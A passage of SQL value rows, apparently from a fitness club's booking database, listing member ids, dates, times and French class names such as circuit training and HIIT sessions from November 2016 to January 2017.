(8354, 50, 'CTR', '2016-11-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8355, 193, 'CTR', '2016-11-16', '18h15', '18h45', 'Circuit Training'),
(8376, 210, 'CTR', '2016-11-16', '19h ', '19h30', 'Circuit training'),
(8357, 228, 'CTR', '2016-11-14', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8358, 235, 'CTR', '2016-11-14', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8359, 230, 'CTR', '2016-11-17', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8483, 48, 'CTR', '2016-11-30', '18h15', '18h45', 'Circuit Training'),
(8362, 196, 'CTR', '2016-11-16', '20h30', '21h00', 'Circuit Training'),
(8363, 173, 'CTR', '2016-11-16', '20h30', '21h00', 'Circuit Training'),
(8528, 188, 'CTR', '2016-12-12', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8366, 188, 'CTR', '2016-11-16', '20h30', '21h00', 'Circuit Training'),
(8367, 220, 'CTR', '2016-11-16', '19h45', '20h15', 'Personal Training'),
(8379, 233, 'CTR', '2016-11-18', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8369, 235, 'CTR', '2016-11-21', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8370, 235, 'CTR', '2016-11-28', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8371, 235, 'CTR', '2016-12-05', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8372, 48, 'CTR', '2016-11-16', '18h15', '18h45', 'Circuit Training'),
(8373, 48, 'CTR', '2016-11-16', '19h ', '19h30', 'Circuit training'),
(8374, 31, 'CTR', '2016-11-16', '18h15', '18h45', 'Circuit Training'),
(8375, 31, 'CTR', '2016-11-16', '19h ', '19h30', 'Circuit training'),
(8377, 195, 'CTR', '2016-11-16', '18h15', '18h45', 'Circuit Training'),
(8392, 193, 'CTR', '2016-11-23', '18h15', '18h45', 'Circuit Training'),
(8380, 233, 'CTR', '2016-11-18', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8381, 205, 'CTR', '2016-11-18', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8382, 205, 'CTR', '2016-11-18', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8383, 205, 'CTR', '2016-11-17', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8384, 188, 'CTR', '2016-11-17', '12h45', '13h15', 'Circuit Training'),
(8385, 205, 'CTR', '2016-11-17', '12h45', '13h15', 'Circuit Training'),
(8386, 189, 'CTR', '2016-11-17', '12h45', '13h15', 'Circuit Training'),
(8387, 28, 'CTR', '2016-11-17', '12h45', '13h15', 'Circuit Training'),
(8388, 199, 'CTR', '2016-11-17', '12h45', '13h15', 'Circuit Training'),
(8389, 140, 'CTR', '2016-11-17', '12h45', '13h15', 'Circuit Training'),
(8391, 209, 'CTR', '2016-11-17', '19h15', '19h45', 'Personal Training'),
(8393, 193, 'CTR', '2016-11-23', '19h ', '19h30', 'Circuit training'),
(8394, 193, 'CTR', '2016-11-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8395, 193, 'CTR', '2016-11-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8396, 48, 'CTR', '2016-11-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8397, 138, 'CTR', '2016-11-23', '18h15', '18h45', 'Circuit Training'),
(8398, 228, 'CTR', '2016-11-21', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8400, 192, 'CTR', '2016-11-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8401, 192, 'CTR', '2016-11-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8411, 256, 'CTR', '2016-11-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8403, 257, 'CTR', '2016-11-21', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8404, 255, 'CTR', '2016-11-21', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8405, 231, 'CTR', '2016-11-21', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8406, 248, 'CTR', '2016-11-21', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8407, 188, 'CTR', '2016-11-21', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8408, 188, 'CTR', '2016-11-21', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8412, 132, 'CTR', '2016-11-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8413, 132, 'CTR', '2016-11-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8414, 249, 'CTR', '2016-11-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8415, 249, 'CTR', '2016-11-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8416, 205, 'CTR', '2016-11-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8417, 205, 'CTR', '2016-11-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8418, 230, 'CTR', '2016-11-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8419, 230, 'CTR', '2016-11-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8452, 210, 'CTR', '2016-11-23', '18h15', '18h45', 'Circuit Training'),
(8451, 230, 'CTR', '2016-11-24', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8426, 31, 'CTR', '2016-11-23', '19h ', '19h30', 'Circuit training'),
(8425, 31, 'CTR', '2016-11-23', '18h15', '18h45', 'Circuit Training'),
(8424, 213, 'CTR', '2016-11-22', '19h15', '19h45', 'Duo Training'),
(8433, 132, 'CTR', '2016-11-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8428, 255, 'CTR', '2016-12-05', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8429, 188, 'CTR', '2016-11-28', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8430, 255, 'CTR', '2016-11-28', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8431, 248, 'CTR', '2016-11-28', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8478, 228, 'CTR', '2016-11-30', '18h15', '18h45', 'Circuit Training'),
(8434, 132, 'CTR', '2016-11-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8435, 180, 'CTR', '2016-11-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8436, 180, 'CTR', '2016-11-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8437, 205, 'CTR', '2016-11-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8438, 205, 'CTR', '2016-11-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8439, 249, 'CTR', '2016-11-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8440, 249, 'CTR', '2016-11-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8441, 256, 'CTR', '2016-11-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8442, 256, 'CTR', '2016-11-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8443, 192, 'CTR', '2016-11-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8444, 192, 'CTR', '2016-11-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8445, 138, 'CTR', '2016-11-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8446, 138, 'CTR', '2016-11-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8447, 230, 'CTR', '2016-11-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8448, 230, 'CTR', '2016-11-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8449, 48, 'CTR', '2016-11-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8450, 48, 'CTR', '2016-11-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8453, 48, 'CTR', '2016-11-23', '18h15', '18h45', 'Circuit Training'),
(8454, 48, 'CTR', '2016-11-23', '19h ', '19h30', 'Circuit training'),
(8455, 220, 'CTR', '2016-11-23', '19h45', '20h15', 'Personal Training'),
(8456, 140, 'CTR', '2016-11-23', '18h15', '18h45', 'Circuit Training'),
(8457, 231, 'CTR', '2016-11-23', '18h15', '18h45', 'Circuit Training'),
(8458, 205, 'CTR', '2016-11-23', '19h ', '19h30', 'Circuit training'),
(8482, 213, 'CTR', '2016-11-29', '19h15', '19h45', 'Duo Training'),
(8460, 173, 'CTR', '2016-11-23', '20h30', '21h00', 'Circuit Training'),
(8461, 247, 'CTR', '2016-11-23', '20h30', '21h00', 'Circuit Training'),
(8517, 48, 'CTR', '2016-12-07', '18h15', '18h45', 'Circuit Training'),
(8464, 188, 'CTR', '2016-11-23', '20h30', '21h00', 'Circuit Training'),
(8465, 195, 'CTR', '2016-11-23', '18h15', '18h45', 'Circuit Training'),
(8466, 251, 'CTR', '2016-11-23', '20h30', '21h00', 'Circuit Training'),
(8467, 205, 'CTR', '2016-11-24', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8468, 80, 'CTR', '2016-11-24', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8481, 255, 'CTR', '2016-12-12', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8470, 188, 'CTR', '2016-11-24', '12h45', '13h15', 'Circuit Training'),
(8471, 28, 'CTR', '2016-11-24', '12h45', '13h15', 'Circuit Training'),
(8472, 199, 'CTR', '2016-11-24', '12h45', '13h15', 'Circuit Training'),
(8473, 205, 'CTR', '2016-11-24', '12h45', '13h15', 'Circuit Training'),
(8474, 189, 'CTR', '2016-11-24', '12h45', '13h15', 'Circuit Training'),
(8475, 80, 'CTR', '2016-11-24', '12h45', '13h15', 'Circuit Training'),
(8476, 209, 'CTR', '2016-11-24', '19h15', '19h45', 'Personal Training'),
(8492, 228, 'CTR', '2016-12-05', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8520, 180, 'lim', '2016-12-09', '12h', '12h45', 'Mercredi oubli inscription'),
(8487, 193, 'CTR', '2016-12-07', '18h15', '18h45', 'Circuit Training'),
(8488, 210, 'CTR', '2016-12-01', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8489, 140, 'CTR', '2016-12-01', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8490, 257, 'CTR', '2016-12-05', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8493, 230, 'CTR', '2016-12-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8494, 230, 'CTR', '2016-12-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8495, 230, 'CTR', '2016-12-08', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8496, 48, 'CTR', '2016-12-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8497, 48, 'CTR', '2016-12-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8498, 249, 'CTR', '2016-12-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8499, 249, 'CTR', '2016-12-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8500, 193, 'CTR', '2016-12-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8501, 193, 'CTR', '2016-12-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8502, 248, 'CTR', '2016-12-05', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8503, 231, 'CTR', '2016-12-05', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8504, 188, 'CTR', '2016-12-05', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8505, 132, 'CTR', '2016-12-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8506, 132, 'CTR', '2016-12-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8507, 205, 'CTR', '2016-12-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8508, 205, 'CTR', '2016-12-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8509, 256, 'CTR', '2016-12-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8510, 256, 'CTR', '2016-12-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8511, 138, 'CTR', '2016-12-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8512, 138, 'CTR', '2016-12-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8513, 80, 'CTR', '2016-12-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8514, 80, 'CTR', '2016-12-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8515, 180, 'CTR', '2016-12-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8516, 180, 'CTR', '2016-12-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8518, 48, 'CTR', '2016-12-07', '19h ', '19h30', 'Circuit training'),
(8556, 255, 'CTR', '2016-12-19', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8530, 138, 'CTR', '2016-12-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8531, 138, 'CTR', '2016-12-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8532, 132, 'CTR', '2016-12-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8533, 132, 'CTR', '2016-12-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8534, 249, 'CTR', '2016-12-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8535, 249, 'CTR', '2016-12-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8536, 256, 'CTR', '2016-12-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8537, 256, 'CTR', '2016-12-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8538, 205, 'CTR', '2016-12-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8539, 205, 'CTR', '2016-12-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8540, 48, 'CTR', '2016-12-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8550, 31, 'CTR', '2016-12-14', '19h ', '19h30', 'Circuit training'),
(8542, 230, 'CTR', '2016-12-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8543, 230, 'CTR', '2016-12-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8544, 180, 'CTR', '2016-12-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8545, 180, 'CTR', '2016-12-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8546, 80, 'CTR', '2016-12-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8547, 80, 'CTR', '2016-12-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8549, 31, 'CTR', '2016-12-14', '18h15', '18h45', 'Circuit Training'),
(8553, 193, 'CTR', '2016-12-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8552, 193, 'CTR', '2016-12-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8562, 193, 'CTR', '2016-12-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8555, 48, 'CTR', '2016-12-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8557, 138, 'CTR', '2016-12-14', '19h ', '19h30', 'Circuit training'),
(8558, 228, 'CTR', '2016-12-14', '18h15', '18h45', 'Circuit Training'),
(8559, 228, 'CTR', '2016-12-14', '19h ', '19h30', 'Circuit training'),
(8560, 48, 'CTR', '2016-12-14', '19h ', '19h30', 'Circuit training'),
(8561, 48, 'CTR', '2016-12-14', '18h15', '18h45', 'Circuit Training'),
(8563, 193, 'CTR', '2016-12-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8615, 132, 'CTR', '2016-12-21', '18h15', '18h45', 'Circuit Training'),
(8566, 195, 'CTR', '2016-12-14', '18h15', '18h45', 'Circuit Training'),
(8567, 231, 'CTR', '2016-12-14', '18h15', '18h45', 'Circuit Training'),
(8568, 205, 'CTR', '2016-12-14', '19h ', '19h30', 'Circuit training'),
(8569, 126, 'CTR', '2016-12-14', '19h ', '19h30', 'Circuit training'),
(8570, 196, 'CTR', '2016-12-14', '20h30', '21h00', 'Circuit Training'),
(8571, 252, 'CTR', '2016-12-14', '20h30', '21h00', 'Circuit Training'),
(8572, 188, 'CTR', '2016-12-14', '20h30', '21h00', 'Circuit Training'),
(8573, 247, 'CTR', '2016-12-14', '20h30', '21h00', 'Circuit Training'),
(8574, 173, 'CTR', '2016-12-14', '20h30', '21h00', 'Circuit Training'),
(8575, 180, 'CTR', '2016-12-14', '20h30', '21h00', 'Circuit Training'),
(8576, 188, 'CTR', '2016-12-19', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8577, 248, 'CTR', '2016-12-19', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8578, 231, 'CTR', '2016-12-19', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8579, 258, 'CTR', '2016-12-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8580, 258, 'CTR', '2016-12-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8581, 256, 'CTR', '2016-12-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8582, 256, 'CTR', '2016-12-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8583, 249, 'CTR', '2016-12-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8584, 249, 'CTR', '2016-12-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8585, 180, 'CTR', '2016-12-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8586, 180, 'CTR', '2016-12-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8587, 138, 'CTR', '2016-12-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8588, 138, 'CTR', '2016-12-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8589, 132, 'CTR', '2016-12-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8590, 132, 'CTR', '2016-12-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8591, 48, 'CTR', '2016-12-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8592, 48, 'CTR', '2016-12-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8593, 205, 'CTR', '2016-12-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8594, 205, 'CTR', '2016-12-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8595, 230, 'CTR', '2016-12-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8596, 230, 'CTR', '2016-12-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8597, 48, 'CTR', '2016-12-21', '18h15', '18h45', 'Circuit Training'),
(8598, 31, 'CTR', '2016-12-21', '18h15', '18h45', 'Circuit Training'),
(8599, 195, 'CTR', '2016-12-21', '18h15', '18h45', 'Circuit Training'),
(8628, 60, 'CTR', '2016-12-21', '20h30', '21h00', 'Circuit Training'),
(8601, 231, 'CTR', '2016-12-21', '18h15', '18h45', 'Circuit Training'),
(8602, 228, 'CTR', '2016-12-21', '18h15', '18h45', 'Circuit Training'),
(8603, 48, 'CTR', '2016-12-21', '19h ', '19h30', 'Circuit training'),
(8604, 31, 'CTR', '2016-12-21', '19h ', '19h30', 'Circuit training'),
(8605, 126, 'CTR', '2016-12-21', '19h ', '19h30', 'Circuit training'),
(8606, 228, 'CTR', '2016-12-21', '19h ', '19h30', 'Circuit training'),
(8607, 205, 'CTR', '2016-12-21', '19h ', '19h30', 'Circuit training'),
(8627, 60, 'CTR', '2016-12-21', '20h30', '21h00', 'Circuit Training'),
(8609, 196, 'CTR', '2016-12-21', '20h30', '21h00', 'Circuit Training'),
(8610, 173, 'CTR', '2016-12-21', '20h30', '21h00', 'Circuit Training'),
(8621, 230, 'CTR', '2016-12-22', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8612, 60, 'CTR', '2016-12-21', '20h30', '21h00', 'Circuit Training'),
(8613, 209, 'CTR', '2016-12-15', '19h15', '19h45', 'Personal Training'),
(8614, 205, 'CTR', '2016-12-15', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8619, 193, 'CTR', '2016-12-21', '18h15', '18h45', 'Circuit Training'),
(8620, 193, 'CTR', '2016-12-21', '19h ', '19h30', 'Circuit training'),
(8618, 257, 'CTR', '2016-12-19', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8622, 255, 'CTR', '2016-12-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8623, 138, 'CTR', '2016-12-21', '18h15', '18h45', 'Circuit Training'),
(8624, 168, 'CTR', '2016-12-21', '19h ', '19h30', 'Circuit training'),
(8625, 168, 'CTR', '2016-12-20', '17h30', '18h00', 'HIIT Sprint'),
(8653, 48, 'CTR', '2016-12-28', '18h15', '18h45', 'Circuit Training'),
(8630, 189, 'CTR', '2016-12-22', '12h45', '13h15', 'Circuit Training'),
(8631, 188, 'CTR', '2016-12-22', '12h45', '13h15', 'Circuit Training'),
(8632, 140, 'CTR', '2016-12-22', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8670, 31, 'CTR', '2017-01-04', '19h ', '19h30', 'Circuit training'),
(8634, 188, 'CTR', '2016-12-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8635, 231, 'CTR', '2016-12-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8636, 248, 'CTR', '2016-12-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8637, 188, 'CTR', '2016-12-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8638, 257, 'CTR', '2016-12-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8639, 180, 'CTR', '2016-12-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8640, 180, 'CTR', '2016-12-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8641, 48, 'CTR', '2016-12-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8642, 48, 'CTR', '2016-12-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8643, 205, 'CTR', '2016-12-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8644, 205, 'CTR', '2016-12-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8645, 132, 'CTR', '2016-12-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8646, 132, 'CTR', '2016-12-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8647, 193, 'CTR', '2016-12-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8648, 193, 'CTR', '2016-12-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8649, 230, 'CTR', '2016-12-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8650, 230, 'CTR', '2016-12-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8651, 249, 'CTR', '2016-12-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8652, 249, 'CTR', '2016-12-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8654, 31, 'CTR', '2016-12-28', '18h15', '18h45', 'Circuit Training'),
(8655, 231, 'CTR', '2016-12-28', '18h15', '18h45', 'Circuit Training'),
(8656, 195, 'CTR', '2016-12-28', '18h15', '18h45', 'Circuit Training'),
(8657, 132, 'CTR', '2016-12-28', '18h15', '18h45', 'Circuit Training'),
(8658, 126, 'CTR', '2016-12-28', '18h15', '18h45', 'Circuit Training'),
(8659, 48, 'CTR', '2016-12-28', '19h ', '19h30', 'Circuit training'),
(8660, 31, 'CTR', '2016-12-28', '19h ', '19h30', 'Circuit training'),
(8661, 168, 'CTR', '2016-12-28', '19h ', '19h30', 'Circuit training'),
(8662, 233, 'CTR', '2016-12-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8663, 140, 'CTR', '2016-12-28', '18h15', '18h45', 'Circuit Training'),
(8685, 255, 'CTR', '2017-01-23', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8666, 138, 'CTR', '2016-12-28', '18h15', '18h45', 'Circuit Training'),
(8669, 31, 'CTR', '2017-01-04', '18h15', '18h45', 'Circuit Training'),
(8671, 92, 'CTR', '2016-12-30', '18h15', '19h15', 'Séance Fin d\'Année 2016 ! :-)'),
(8672, 180, 'CTR', '2016-12-30', '18h15', '19h15', 'Séance Fin d\'Année 2016 ! :-)'),
(8673, 80, 'CTR', '2016-12-30', '18h15', '19h15', 'Séance Fin d\'Année 2016 ! :-)'),
(8674, 80, 'CTR', '2016-12-30', '18h15', '19h15', 'Séance Fin d\'Année 2016 ! :-)'),
(8675, 80, 'CTR', '2016-12-30', '18h15', '19h15', 'Séance Fin d\'Année 2016 ! :-)'),
(8676, 48, 'CTR', '2017-01-04', '18h15', '18h45', 'Circuit Training'),
(8677, 48, 'CTR', '2017-01-04', '19h ', '19h30', 'Circuit training'),
(8708, 230, 'CTR', '2017-01-12', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8715, 193, 'CTR', '2017-01-12', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8716, 132, 'CTR', '2017-01-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8726, 48, 'CTR', '2017-01-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8686, 132, 'CTR', '2017-01-11', '18h15', '18h45', 'Circuit Training'),
(8687, 132, 'CTR', '2017-01-11', '19h ', '19h30', 'Circuit training'),
(8688, 231, 'CTR', '2017-01-11', '18h15', '18h45', 'Circuit Training'),
(8689, 231, 'CTR', '2017-01-11', '19h ', '19h30', 'Circuit training'),
(8690, 90, 'CTR', '2017-01-11', '20h30', '21h00', 'Circuit Training'),
(8691, 90, 'CTR', '2017-01-11', '20h30', '21h00', 'Circuit Training'),
(8692, 196, 'CTR', '2017-01-11', '20h30', '21h00', 'Circuit Training'),
(8693, 173, 'CTR', '2017-01-11', '20h30', '21h00', 'Circuit Training'),
(8694, 247, 'CTR', '2017-01-11', '20h30', '21h00', 'Circuit Training'),
(8695, 48, 'CTR', '2017-01-11', '18h15', '18h45', 'Circuit Training'),
(8696, 48, 'CTR', '2017-01-11', '19h ', '19h30', 'Circuit training'),
(8697, 31, 'CTR', '2017-01-11', '18h15', '18h45', 'Circuit Training'),
(8698, 31, 'CTR', '2017-01-11', '19h ', '19h30', 'Circuit training'),
(8699, 195, 'CTR', '2017-01-11', '18h15', '18h45', 'Circuit Training'),
(8700, 188, 'CTR', '2017-01-11', '20h30', '21h00', 'Circuit Training'),
(8703, 193, 'CTR', '2017-01-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8704, 193, 'CTR', '2017-01-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8705, 210, 'CTR', '2017-01-11', '18h15', '18h45', 'Circuit Training'),
(8732, 230, 'CTR', '2017-01-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8753, 140, 'CTR', '2017-01-18', '18h15', '18h45', 'Circuit Training'),
(8734, 249, 'CTR', '2017-01-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8711, 56, 'CTR', '2017-01-11', '18h15', '18h45', 'Circuit Training'),
(8733, 230, 'CTR', '2017-01-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8717, 80, 'CTR', '2017-01-11', '20h30', '21h00', 'Circuit Training'),
(8718, 205, 'CTR', '2017-01-12', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8719, 132, 'CTR', '2017-01-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8720, 180, 'CTR', '2017-01-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8721, 180, 'CTR', '2017-01-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8722, 205, 'CTR', '2017-01-11', '18h15', '18h45', 'Circuit Training'),
(8723, 205, 'CTR', '2017-01-11', '19h ', '19h30', 'Circuit training'),
(8756, 230, 'CTR', '2017-01-19', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8727, 48, 'CTR', '2017-01-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8754, 48, 'CTR', '2017-01-18', '18h15', '18h45', 'Circuit Training'),
(8735, 249, 'CTR', '2017-01-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8736, 188, 'CTR', '2017-01-16', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8737, 231, 'CTR', '2017-01-16', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8751, 258, 'CTR', '2017-01-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
